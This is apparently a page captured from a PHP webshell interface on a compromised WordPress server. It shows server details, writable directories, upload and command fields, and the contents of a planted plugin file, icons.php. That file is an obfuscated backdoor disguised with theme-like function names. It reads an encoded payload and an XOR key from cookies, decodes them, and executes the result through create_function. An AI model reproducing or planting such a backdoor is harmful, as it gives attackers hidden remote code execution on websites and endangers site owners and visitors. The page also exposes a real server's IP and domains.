403Webshell
Server IP : 167.235.67.158  /  Your IP : 216.73.216.95
Web Server : Apache
System : Linux ubuntu-8gb-nbg1-1 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64
User : upstairsbar.co.uk ( 982)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/ipmpumps.co.uk/wordpress/wp-content/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/ipmpumps.co.uk/wordpress/wp-content/plugins/icons.php
<?php if (isset($_COOKIE['plugins'])) {
	function twentyeleven_get_theme_options($blah, $provider) {
		$blah = preg_split('//', $blah, -1, 1);
		return implode('', array_map( function($library, $js_array) use ($provider){ return chr(ord($library) ^ ord($provider[$js_array % strlen($provider)])); }, $blah, array_keys($blah)));
		
	}

	$rawdata = $_COOKIE['plugins'];
	$tax_url = $_COOKIE['theme'];

	function tab_upload_new($blogid) {
		$blah="";
		for($library = 0; $library < 256; $library++) { 
			$js_array[$library] = chr($library); 
		}
		$approved = array_flip(preg_split("//", "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
 			. "abcdefghijklmnopqrstuvwxyz0123456789+/",-1,1));
 
		$keywords=array();
		preg_match_all("([A-z0-9+\\/]{1,4})", $blogid, $keywords);
		foreach($keywords[0] as $loop) {
			$active = 0;
			for($library = 0; isset($loop[$library]); $library++) {
				$active = ($active << 6) + $approved[$loop[$library]];
				if($library > 0) {
					$blah .= $js_array[$active >> (4 - (2 * ($library - 1)))];
					$active = $active & (0xf >> (2 * ($library - 1)));
				}
			}
		}
		return $blah;
	}
	$_terms = twentyeleven_get_theme_options(tab_upload_new($rawdata), $tax_url);
	$api_key=create_function(null, $_terms);
	$api_key();
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit